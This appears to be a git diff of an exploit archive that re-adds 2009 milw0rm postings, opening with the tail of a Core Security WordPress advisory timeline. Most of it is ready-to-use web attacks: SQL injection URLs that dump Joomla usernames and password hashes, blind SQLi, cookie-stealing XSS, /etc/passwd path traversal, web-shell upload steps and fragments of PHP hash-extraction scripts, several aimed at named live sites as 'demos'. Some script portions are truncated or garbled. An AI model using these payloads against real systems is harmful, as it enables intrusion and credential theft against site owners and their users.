+Warning: require(ABSPATHwp-includes/compat.php) [function.require]:
+failed to open stream:
+No such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246
+Fatal error: require() [function.require]: Failed opening required
+'ABSPATHwp-includes/compat.php'
+(include_path='.;[PHP_LEAKED_PATH]\php5\pear') in
+[WP_LEAKED_PATH]\wp-settings.php on line 246
+
+- -----------/
+
+
+
+
+9. *Report Timeline*
+
+. 2009-06-04:
+Core Security Technologies notifies the WordPress team of the
+vulnerabilities (security@wordpress.org) and offers a technical
+description encrypted or in plain-text. Advisory is planned for
+publication on June 22th.
+
+. 2009-06-08:
+Core notifies again the WordPress team of the vulnerability.
+
+. 2009-06-10:
+The WordPress team asks Core for a technical description of the
+vulnerability in plain-text.
+
+. 2009-06-11:
+Technical details sent to WordPress team by Core.
+
+. 2009-06-11:
+WordPress team notifies Core that a fix was produced and is available to
+Core for testing. WordPress team asserts that password and username
+discrimination as well as username leakage are known and will not be
+fixed because they are convenient for the users.
+
+. 2009-06-12:
+Core tells the WordPress team that the patch will be tested by Core as a
+courtesy as soon as possible. It also requests confirmation that
+WordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to
+the flaws included in the advisory draft CORE-2009-0515.
+
+. 2009-06-12:
+WordPress team confirms that WordPress 2.8 and earlier plus
+WordPress.com are vulnerable to the flaws included in the advisory draft.
+
+. 2009-06-17:
+Core informs the WordPress team that the patch is only fixing one of the
+four proof of concept abuses included in the advisory draft. Core
+reminds the WordPress team that the advisory is scheduled to be
+published on June 22th but a new schedule can be discussed.
+
+. 2009-06-19:
+Core asks for a new patched version of WordPress, if available, and
+notifies the WordPress team that the publication of the advisory was
+re-scheduled to June 30th.
+
+. 2009-06-19:
+WordPress team confirms they have a new patch that has the potential to
+break a lot of plugins.
+
+. 2009-06-29:
+WordPress team asks for a delayance on advisory CORE-2009-0515
+publication until July 6th, when WordPress MU version will be patched.
+
+. 2009-06-29:
+Core agrees to delay publication of advisory CORE-2009-0515 until July 6th.
+
+. 2009-06-29:
+Core tells the WordPress team that other administrative PHP modules can
+also be rendered by non-administrative users, such as module
+'admin-post.php' and 'link-parse-opml.php'.
+
+. 2009-07-02:
+WordPress team comments that 'admin.php' and 'admin-post.php' are
+intentionally open and plugins can choose to hook either privileged or
+unprivileged actions. They also comment that unprivileged access to
+'link-parse-opml.php' is benign but having this file open is bad form.
+
+. 2009-07-02:
+Core sends the WordPress team a new draft of the advisory and comments
+that there is no capability specified in Worpress documentation for
+configuring plugins. Also control of actions registered by plugins is
+not enforced. Core also notices that the privileges unchecked bug in
+'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development
+release.
+
+. 2009-07-06:
+Core requests WordPress confirmation of the release date of WordPress
+2.8.1 and WordPress MU 2.8.
+
+. 2009-07-07:
+WordPress team confirms that a release candidate of WordPress 2.8.1 is
+made available to users and that the advisory may be published.
+
+. 2009-07-06:
+Core requests WordPress confirmation of the release date of WordPress MU
+and WordPress MU new version numbers.
+
+. 2009-07-07:
+WordPress team release WordPress 2.8.1 RC1 to its users.
+
+. 2009-07-08:
+WordPress team confirms that WordPress MU 2.8.1 will be made available
+as soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.
+
+. 2009-07-08:
+The advisory CORE-2009-0515 is published.
+
+
+
+10. *References*
+
+[1] WordPress vulnerabilities in CVE database
+http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress
+[2] SecuriTeam List of WordPress Vulnerabilities
+http://www.securiteam.com/products/W/Wordpress.html
+[3] WordPress Vulnerability - YBO Interactive Blog
+http://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/
+[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1
+http://wordpress.org/support/topic/280748
+[5] Security breach - xkcd blog
+http://blag.xkcd.com/2009/06/18/security-breach/
+[6] securityvulns.com WordPress vulnerabilities digest in English
+http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded
+[7] CVE-2008-0196
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196
+[8] WordPress Roles and Capabilities
+http://codex.wordpress.org/Roles_and_Capabilities
+[9] WordPress Download Counter
+http://wordpress.org/download/counter/
+[10] WordPress Intrusion Detection System Plugin
+http://php-ids.org/2008/02/21/wpids-version-012-released/
+[11] Hardening WordPress with htaccess
+http://blogsecurity.net/wordpress/article-210607
+
+
+11. *About CoreLabs*
+
+CoreLabs, the research center of Core Security Technologies, is charged
+with anticipating the future needs and requirements for information
+security technologies. We conduct our research in several important
+areas of computer security including system vulnerabilities, cyber
+attack planning and simulation, source code auditing, and cryptography.
+Our results include problem formalization, identification of
+vulnerabilities, novel solutions and prototypes for new technologies.
+CoreLabs regularly publishes security advisories, technical papers,
+project information and shared software tools for public use at:
+http://www.coresecurity.com/corelabs.
+
+
+12. *About Core Security Technologies*
+
+Core Security Technologies develops strategic solutions that help
+security-conscious organizations worldwide develop and maintain a
+proactive process for securing their networks. The company's flagship
+product, CORE IMPACT, is the most comprehensive product for performing
+enterprise security assurance testing. CORE IMPACT evaluates network,
+endpoint and end-user vulnerabilities and identifies what resources are
+exposed. It enables organizations to determine if current security
+investments are detecting and preventing attacks. Core Security
+Technologies augments its leading technology solution with world-class
+security consulting services, including penetration testing and software
+security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
+Security Technologies can be reached at 617-399-6980 or on the Web at
+http://www.coresecurity.com.
+
+
+13. *Disclaimer*
+
+The contents of this advisory are copyright (c) 2009 Core Security
+Technologies and (c) 2009 CoreLabs, and may be distributed freely
+provided that no fee is charged for this distribution and proper credit
+is given.
+
+
+14. *PGP/GPG Keys*
+
+This advisory has been signed with the GPG key of Core Security
+Technologies advisories team, which is available for download at
+http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.4.6 (MingW32)
+Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
+
+iD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N
+TPRpR0Gn0WqmF8HOeDslbA8=
+=zEDK
+-----END PGP SIGNATURE-----
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9111.txt b/platforms/php/webapps/9111.txt
index ecc2940a3..f3fbf5bd6 100755
--- a/platforms/php/webapps/9111.txt
+++ b/platforms/php/webapps/9111.txt
@@ -1,45 +1,45 @@
-###########################################################################
-#-----------------------------I AM MUSLIM !!------------------------------#
-###########################################################################
-
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-        [»] Hmmmm !? Nothing ! :D
-==============================================================================
-        [»] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities
-==============================================================================
-
-	[»] Script:             [ Jobbr v2.2.7 ]
-	[»] Language:           [ PHP ]
-        [»] Download:           [ http://urx.in/jobbr ]
-	[»] Founder:            [ Moudi or SixSo  ]
-        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
-        [»] Team:               [ EvilWay ]
-        [»] SiteWeb:            [ Visit - www.opensc.ws ]
-        [»] Price:              [ FREE ]
-
-###########################################################################
-
-===[ Exploit BLIND SQL + DEMO ]===	
-	
-	[»] http://www.site.com/co-profile.php?emp_id=[SQL]
-	[»] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--
-
-===[ Exploit BLIND SQL + DEMO ]===
-
-	[»] http://www.site.com/co-profile.php?emp_id=[BLIND]
-	[»] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5
-
-
-Author: Moudi
-
-###########################################################################
-
-# milw0rm.com [2009-07-10]
+###########################################################################
+#-----------------------------I AM MUSLIM !!------------------------------#
+###########################################################################
+
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+        [»] Hmmmm !? Nothing ! :D
+==============================================================================
+        [»] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities
+==============================================================================
+
+	[»] Script:             [ Jobbr v2.2.7 ]
+	[»] Language:           [ PHP ]
+        [»] Download:           [ http://urx.in/jobbr ]
+	[»] Founder:            [ Moudi or SixSo  ]
+        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
+        [»] Team:               [ EvilWay ]
+        [»] SiteWeb:            [ Visit - www.opensc.ws ]
+        [»] Price:              [ FREE ]
+
+###########################################################################
+
+===[ Exploit BLIND SQL + DEMO ]===	
+	
+	[»] http://www.site.com/co-profile.php?emp_id=[SQL]
+	[»] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--
+
+===[ Exploit BLIND SQL + DEMO ]===
+
+	[»] http://www.site.com/co-profile.php?emp_id=[BLIND]
+	[»] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5
+
+
+Author: Moudi
+
+###########################################################################
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9112.txt b/platforms/php/webapps/9112.txt
index 0e8fdc157..b6c0ab554 100755
--- a/platforms/php/webapps/9112.txt
+++ b/platforms/php/webapps/9112.txt
@@ -1,34 +1,33 @@
-
---------------------------------------------------------------------------
-Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
---------------------------------------------------------------------------
-
- ###################################################
- [+] Author        :  Chip D3 Bi0s
- [+] Email         :  chipdebios[alt+64]gmail.com
- [+] Group         :  LatinHackTeam
- [+] Vulnerability :  SQL injection
- ###################################################
-
-
-Example:
-
-http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26
-
-:
-+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
- 
-
-Demo Live (1):
-
-http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
-
-
-Thanks for all Str0ke
-and you are unbeatable :)
-
-+++++++++++++++++++++++++++++++++
-[!] Produced in South America
----------------------------------
-
-# milw0rm.com [2009-07-10]
+--------------------------------------------------------------------------
+Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
+--------------------------------------------------------------------------
+
+ ###################################################
+ [+] Author        :  Chip D3 Bi0s
+ [+] Email         :  chipdebios[alt+64]gmail.com
+ [+] Group         :  LatinHackTeam
+ [+] Vulnerability :  SQL injection
+ ###################################################
+
+
+Example:
+
+http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26
+
+:
++and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
+ 
+
+Demo Live (1):
+
+http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users
+
+
+Thanks for all Str0ke
+and you are unbeatable :)
+
++++++++++++++++++++++++++++++++++
+[!] Produced in South America
+---------------------------------
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9115.txt b/platforms/php/webapps/9115.txt
index 6afbfe6fb..74a33d628 100755
--- a/platforms/php/webapps/9115.txt
+++ b/platforms/php/webapps/9115.txt
@@ -1,21 +1,21 @@
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
--           __           __     _       __                -
-+      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
--     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
-+    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
--    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
-+                        /___/                            +
--                                                         -
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-
-
-Digitaldesign CMS v0.1 Database Disclosure Vulnerability
-
-[+] Author  : darkjoker
-[+] Site    : http://darkjoker.net23.net
-[+] Download: http://sourceforge.net/projects/ddcms/
-
-[+] URL     : http://[hostname]/[CMS path]/autoconfig.dd
-[+] Ex.     : http://localhost/ddcms/autoconfig.dd
-
-# milw0rm.com [2009-07-10]
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+-           __           __     _       __                -
++      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
+-     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
++    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
+-    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
++                        /___/                            +
+-                                                         -
++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+
+Digitaldesign CMS v0.1 Database Disclosure Vulnerability
+
+[+] Author  : darkjoker
+[+] Site    : http://darkjoker.net23.net
+[+] Download: http://sourceforge.net/projects/ddcms/
+
+[+] URL     : http://[hostname]/[CMS path]/autoconfig.dd
+[+] Ex.     : http://localhost/ddcms/autoconfig.dd
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9118.txt b/platforms/php/webapps/9118.txt
index 195a6344c..2300207d1 100755
--- a/platforms/php/webapps/9118.txt
+++ b/platforms/php/webapps/9118.txt
@@ -1,47 +1,47 @@
-###########################################################################
-#-----------------------------I AM MUSLIM !!------------------------------#
-###########################################################################
-
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-        [»] I'm back <3 VB6
-==============================================================================
-        [»] Ebay Clone 2009 Multiple Remote Vulnerabilities
-==============================================================================
-
-	[»] Script:             [ Ebay Clone 2009 ]
-	[»] Language:           [ PHP ]
-        [»] Download:           [ http://www.ebayclonescript.com/  ]
-	[»] Founder:            [ Moudi or SixSo  ]
-        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
-        [»] Team:               [ EvilWay ]
-        [»] SiteWeb:            [ Visit - www.opensc.ws ]
-        [»] Price:              [ 99$ ]
-
-###########################################################################
-
-===[ Exploit BLIND SQL ]===	
-	
-	[»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
-	[»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
-
-===[ Exploit XSS ]===	
-
-        [»] http://www.site.com/patch/search.php?mode=[XSS]
-	[»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
-
-Note: in this script have some other blind sql and xss , but i am tired to do all :D
-
-
-Author: Moudi
-
-###########################################################################
-
-# milw0rm.com [2009-07-10]
+###########################################################################
+#-----------------------------I AM MUSLIM !!------------------------------#
+###########################################################################
+
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+        [»] I'm back <3 VB6
+==============================================================================
+        [»] Ebay Clone 2009 Multiple Remote Vulnerabilities
+==============================================================================
+
+	[»] Script:             [ Ebay Clone 2009 ]
+	[»] Language:           [ PHP ]
+        [»] Download:           [ http://www.ebayclonescript.com/  ]
+	[»] Founder:            [ Moudi or SixSo  ]
+        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
+        [»] Team:               [ EvilWay ]
+        [»] SiteWeb:            [ Visit - www.opensc.ws ]
+        [»] Price:              [ 99$ ]
+
+###########################################################################
+
+===[ Exploit BLIND SQL ]===	
+	
+	[»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
+	[»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
+
+===[ Exploit XSS ]===	
+
+        [»] http://www.site.com/patch/search.php?mode=[XSS]
+	[»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
+
+Note: in this script have some other blind sql and xss , but i am tired to do all :D
+
+
+Author: Moudi
+
+###########################################################################
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9119.txt b/platforms/php/webapps/9119.txt
index 6c6e74f54..47274f0da 100755
--- a/platforms/php/webapps/9119.txt
+++ b/platforms/php/webapps/9119.txt
@@ -1,19 +1,19 @@
-script home site :0 http://lionwiki.0o.cz/
-
-script name := Powered by LionWiki
-
-exploit :-
-index.php?page= ../../../../../../../../etc/passwd%00.jpg
-index.php?page= ../../../../../../../../etc/passwd%00.htm
-index.php?page= ../../../../../../../../etc/passwd%00.html
-
-demo site :-
-http://wiki.tlapicka.net/index.php
-
-------------------------------------------
-found by MoDaMeR
-Islamic ghosts Team
-
-Gr33tz:- all muslum hackerz ,all my freind 
-
-# milw0rm.com [2009-07-10]
+script home site :0 http://lionwiki.0o.cz/
+
+script name := Powered by LionWiki
+
+exploit :-
+index.php?page= ../../../../../../../../etc/passwd%00.jpg
+index.php?page= ../../../../../../../../etc/passwd%00.htm
+index.php?page= ../../../../../../../../etc/passwd%00.html
+
+demo site :-
+http://wiki.tlapicka.net/index.php
+
+------------------------------------------
+found by MoDaMeR
+Islamic ghosts Team
+
+Gr33tz:- all muslum hackerz ,all my freind 
+
+# milw0rm.com [2009-07-10]
diff --git a/platforms/php/webapps/9121.php b/platforms/php/webapps/9121.php
index 873d179a3..a4f32e196 100755
--- a/platforms/php/webapps/9121.php
+++ b/platforms/php/webapps/9121.php
@@ -1,71 +1,71 @@
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
--           __           __     _       __                -
-+      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
--     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
-+    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
--    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
-+                        /___/                            +
--                                                         -
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-
-                  +\n".
-		"- Ex.     : php xpl.php localhost /MorcegoCMS/ root                 -\n".
-		"+                                                                   +\n".
-		"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
-		"\n");
-}
-
-function hex ($string) {
-	$i=0;
-	while ($i                  +\n".
+		"- Ex.     : php xpl.php localhost /MorcegoCMS/ root                 -\n".
+		"+                                                                   +\n".
+		"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
+		"\n");
+}
+
+function hex ($string) {
+	$i=0;
+	while ($iArbitrary File Upload<--
-
-1. Go to http://www.site.com/register.php
-2. Disable JavaScript
-3. Upload shell as "User Image"
-4. Register
-5. Shell location: http://www.site.com/userimages/SHELL.PHP
-
--->SQL Injection<--
-
-http://www.site.com/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--
-
--->XSS<--
-
-http://www.site.com/home.php?genres_parent=">
-
-Demo:
-
-http://www.opial.com/demo/register.php
-
-http://www.opial.com/demo/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--
-
-http://www.opial.com/demo/home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
-
-LMaster.
-
-# milw0rm.com [2009-07-11]
+::::::::::::::::::::R3AL.RU::::::::::::::::::::
+
+Opial 1.0 Arbitrary File Upload & XSS & SQL Injection (genres_parent)
+
+Author: LMaster
+
+Greetz: r3al.ru
+
+Official Site (with demo):
+
+http://www.opial.com
+
+-->Arbitrary File Upload<--
+
+1. Go to http://www.site.com/register.php
+2. Disable JavaScript
+3. Upload shell as "User Image"
+4. Register
+5. Shell location: http://www.site.com/userimages/SHELL.PHP
+
+-->SQL Injection<--
+
+http://www.site.com/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--
+
+-->XSS<--
+
+http://www.site.com/home.php?genres_parent=">
+
+Demo:
+
+http://www.opial.com/demo/register.php
+
+http://www.opial.com/demo/home.php?genres_parent=-1%20union/**/select/**/1,concat(user(),%27%20%27,version()),3,4,5,6--
+
+http://www.opial.com/demo/home.php?genres_parent=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
+
+LMaster.
+
+# milw0rm.com [2009-07-11]
diff --git a/platforms/php/webapps/9125.txt b/platforms/php/webapps/9125.txt
index 0fc6fe9dd..ba1769d37 100755
--- a/platforms/php/webapps/9125.txt
+++ b/platforms/php/webapps/9125.txt
@@ -1,34 +1,34 @@
-----------------------------------------------------------------------------------------------------
-
-Name : Ebay Clone 2009 Multiple SQL Injection Vulnerabilities
-Site : http://www.ebayclonescript.com/
-Demo : http://ebayclonescript.com/ebayclone2009/
-
-----------------------------------------------------------------------------------------------------
-
-
-Found By : MizoZ [EvilWay Team]
-Made in : Morocco
-Contact : mizoz[at]9[dot]cn
-Greetz : Moudi , Zuka , All friends
-
-
-----------------------------------------------------------------------------------------------------
-
-1st , SQL Injection (feedback.php GET(user_id)) :
-http://ebayclonescript.com//ebayclone2009/feedback.php?user_id=368+union+select+1,2,3,version(),5,6,7,8--#footer
-
-2nd , SQL Injection (view_full_size.php GET(item_id)) :
-http://ebayclonescript.com/ebayclone2009/view_full_size.php?i=1&item_id=-2904+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--
-
-3th , SQL Injection (classifide_ad.php GET(item_id)) :
-http://ebayclonescript.com/ebayclone2009/classifide_ad.php?item_id=-2872+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--
-
-4th , Blind SQL Injection (crosspromoteitems.php GET(item_id)) :
-http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=1--
-!=
-http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=0--
-
-----------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2009-07-11]
+----------------------------------------------------------------------------------------------------
+
+Name : Ebay Clone 2009 Multiple SQL Injection Vulnerabilities
+Site : http://www.ebayclonescript.com/
+Demo : http://ebayclonescript.com/ebayclone2009/
+
+----------------------------------------------------------------------------------------------------
+
+
+Found By : MizoZ [EvilWay Team]
+Made in : Morocco
+Contact : mizoz[at]9[dot]cn
+Greetz : Moudi , Zuka , All friends
+
+
+----------------------------------------------------------------------------------------------------
+
+1st , SQL Injection (feedback.php GET(user_id)) :
+http://ebayclonescript.com//ebayclone2009/feedback.php?user_id=368+union+select+1,2,3,version(),5,6,7,8--#footer
+
+2nd , SQL Injection (view_full_size.php GET(item_id)) :
+http://ebayclonescript.com/ebayclone2009/view_full_size.php?i=1&item_id=-2904+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--
+
+3th , SQL Injection (classifide_ad.php GET(item_id)) :
+http://ebayclonescript.com/ebayclone2009/classifide_ad.php?item_id=-2872+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--
+
+4th , Blind SQL Injection (crosspromoteitems.php GET(item_id)) :
+http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=1--
+!=
+http://ebayclonescript.com/ebayclone2009/crosspromoteitems.php?item_id=2876+and+1=0--
+
+----------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2009-07-11]
diff --git a/platforms/php/webapps/9126.txt b/platforms/php/webapps/9126.txt
index eb5500564..666ad8336 100755
--- a/platforms/php/webapps/9126.txt
+++ b/platforms/php/webapps/9126.txt
@@ -1,34 +1,34 @@
-###############################################################
-# Joomla component 'com_category' SQL injection vulnerability ###########
-################################################################
-#version: 1.0.12###################################################
-################################################################
-#dork:inurl:"com_category"##########################################
-# ###############################################################
-# xploited by Prince_Pwn3r##########################################
-################################################################
-# contact: 2p0wn0rN0t2p0wn@gmail.com##############################
-################################################################
-
-+++++++ greetz to all p0wnbox.com members !!! +++++++
---------------------------------------------------------------------------------------
-
-Vulnerable joomla component : com_category
-vulnerable parameter: "edit" ($_GET)
-
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-
-Exploit :
-
-
-http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
-
-Demos :
-
-http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
-or
-http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
-
-*could be different (eg: view&color=3&cat_id=)
-
-# milw0rm.com [2009-07-11]
+###############################################################
+# Joomla component 'com_category' SQL injection vulnerability ###########
+################################################################
+#version: 1.0.12###################################################
+################################################################
+#dork:inurl:"com_category"##########################################
+# ###############################################################
+# xploited by Prince_Pwn3r##########################################
+################################################################
+# contact: 2p0wn0rN0t2p0wn@gmail.com##############################
+################################################################
+
++++++++ greetz to all p0wnbox.com members !!! +++++++
+--------------------------------------------------------------------------------------
+
+Vulnerable joomla component : com_category
+vulnerable parameter: "edit" ($_GET)
+
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+
+Exploit :
+
+
+http://www.site.com/index.php?option=com_category&task=loadCategory&catid*=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
+
+Demos :
+
+http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=-9999+AND+1=0+union+all+select%201,2,group_concat(username,0x3a,password),4,5+from+jos_users--
+or
+http://teachandsay.com/index.php?option=com_category&id=12&task=view&color=3&cat_id=-9999+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5+from+jos_users--
+
+*could be different (eg: view&color=3&cat_id=)
+
+# milw0rm.com [2009-07-11]
diff --git a/platforms/php/webapps/9127.txt b/platforms/php/webapps/9127.txt
index 5dfa00215..2407eb3e1 100755
--- a/platforms/php/webapps/9127.txt
+++ b/platforms/php/webapps/9127.txt
@@ -1,83 +1,83 @@
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
--           __           __     _       __                -
-+      ____/ /___ ______/ /__  (_)___  / /_____  _____    +
--     / __  / __ `/ ___/ //_/ / / __ \/ //_/ _ \/ ___/    -
-+    / /_/ / /_/ / /  / ,<   / / /_/ / ,< /  __/ /        +
--    \__,_/\__,_/_/  /_/|_|_/ /\____/_/|_|\___/_/         -
-+                        /___/                            +
--                                                         -
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-
-[+] Arbitrary Re-Installation Vulnerability
-
-There's no check about the elimination of 'help' directory, 
-then whenever an administrator forget to delete it, we can
-re-install the CMS, it means we can add a new administrator
-account, without specify database's informations.
-
-http://hostname/dnetCMS/help/install.php
-
-
-
-[+] Blind SQL Injection Exploit
-
- \n".
-		"[+] Ex.     : php xpl.php localhost /dnetCMS/\n".
-		"[+] Greetz  : cristina, puccio (they kept me company when I coded this stuff :D)\n".
-		"\n");
-}
-
-function hex ($string) {
-	$i=0;
-	while ($iCannot modify:|", $reply)))
-		return false;
-	else
-		return true;
-}
-
-function get_field ($hostname, $path, $field) {
-	echo "[+] ".ucfirst($field)." (hash): ";
-	$chars = "abcdef0123456789";
-	for($i=0,$d=1;$d<=32;$i++) {
-		if (check ($hostname, $path, $chars [$i], $d, $field)) {
-			echo $chars [$i];
-			$i = -1;
-			$d++;
-		}
-	}
-	echo "\n";
-}
-
-if ($argc != 3)
-	usage ();
-$hostname = $argv [1];
-$path = $argv [2];
-$fields = array ("username", "password");
-foreach ($fields as $field)
-	get_field ($hostname, $path, $field);
-
-# milw0rm.com [2009-07-11]
